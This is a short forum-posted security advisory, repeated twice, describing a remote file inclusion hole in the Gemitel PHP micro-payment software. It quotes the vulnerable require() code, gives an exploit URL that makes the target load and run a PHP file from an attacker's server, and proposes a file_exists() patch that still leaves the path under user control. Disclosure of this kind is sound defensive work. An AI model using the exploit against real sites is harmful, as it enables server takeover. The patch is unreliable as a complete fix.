jaguar
16/04/04, 03:55
GEMITEL V 3 build 50 :: include vulnerability
URL : http://www.isesam.com/
FORUM : http://www.isesam.com/forums/gemitel/thread_open.shtml
Vendor has been contacted.
Description :
---------------
Gemitel is a free software written in php that allows to manage micro payments like allopass, mediapaiement, optelo-Sponsup or Rentabiliweb.
Vulnerability :
----------------
File : html/affich.php
Code:
************************************************** ***************************
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");
************************************************** *****************************
You can include sp-turn.php from where you want by specifying the variable $base.
Exploit :
----------
http://[vulnerable host]/[Gemitel folder]/html/affich.php?base=http://[your server]/
In [your server] you must have a sp-turn.php file which will be included by vulnerable host.
Solution:
-----------
Replace :
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");
By
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
if(file_exists($f_inc)){require("$f_inc");}
//require("sp-turn.php");
----------------------------------------------------------
jaguar[at]wulab.com
http://www.wulab.com [hacking & Security]
-----------------------------------------------------------
URL : http://www.isesam.com/
FORUM : http://www.isesam.com/forums/gemitel/thread_open.shtml
Vendor has been contacted.
Description :
---------------
Gemitel is a free software written in php that allows to manage micro payments like allopass, mediapaiement, optelo-Sponsup or Rentabiliweb.
Vulnerability :
----------------
File : html/affich.php
Code:
************************************************** ***************************
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");
************************************************** *****************************
You can include sp-turn.php from where you want by specifying the variable $base.
Exploit :
----------
http://[vulnerable host]/[Gemitel folder]/html/affich.php?base=http://[your server]/
In [your server] you must have a sp-turn.php file which will be included by vulnerable host.
Solution:
-----------
Replace :
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
require("$f_inc");
//require("sp-turn.php");
By
$f_inc=$base."sp-turn.php";
$plus = "../"; // rajoute au chemin pour trouver les fichiers .txt
if(file_exists($f_inc)){require("$f_inc");}
//require("sp-turn.php");
----------------------------------------------------------
jaguar[at]wulab.com
http://www.wulab.com [hacking & Security]
-----------------------------------------------------------